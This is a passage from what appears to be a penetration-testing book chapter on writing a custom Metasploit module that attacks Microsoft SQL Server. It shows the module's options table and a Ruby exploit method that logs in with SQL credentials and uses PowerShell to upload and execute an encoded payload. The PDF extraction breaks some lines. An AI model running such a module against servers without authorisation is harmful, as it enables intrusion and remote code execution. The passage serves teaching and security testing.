background image

Building Your Own Module

191

Module options:

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   PASSWORD                        no        The password for the specified username
   RHOST                           yes       The target address
   RPORT          1433             yes       The target port
   USERNAME       sa               no        The username to authenticate as
   UsePowerShell  true             no        Use PowerShell as payload delivery method instead

Recall from Chapter 5 that the 

show options

 command will display any 

new options that have been added to an exploit. After we set these options, 
they will be stored within Metasploit as valid options.

Now we’ll finalize the 

mssql_powershell.rb

 file, which we have been editing 

since the beginning of this chapter, before we edit 

mssql.rb

 (which will be 

explained shortly).

When you examine the exploits in the 

modules

 directory inside Metasploit 

(

modules/exploits

modules/auxiliary/

, and so on), you’ll notice that most of 

them have the same overall structure (

def

 exploit as an example). Remember 

always to comment your code to give other developers an idea of what it’s 
doing! In the following listing, we first introduce our 

def exploit

 line, which 

defines what we’ll be doing in our exploit. We’ll frame our exploit the same 
way as the other modules and add a few new sections, as explained next:

     def exploit

          # if u/n and p/w didn't work throw error

if(not mssql_login_datastore)

print_status(

"Invalid SQL Server credentials"

)

               return
          end

          # Use powershell method for payload delivery

if (datastore['UsePowerShell'])

powershell_upload_exec(Msf::Util::EXE.to_win32pe(framework,payload.encoded))

            end
            handler
            disconnect
     end
end

The module first checks to see if we are logged in at  . If we aren’t logged 

in, the error message 

"Invalid SQL Server Credentials"

   is displayed. The 

UsePowerShell

 method at   is used to call the function 

powershell_upload_exec

  , 

which will automatically create a Metasploit-based payload that we specify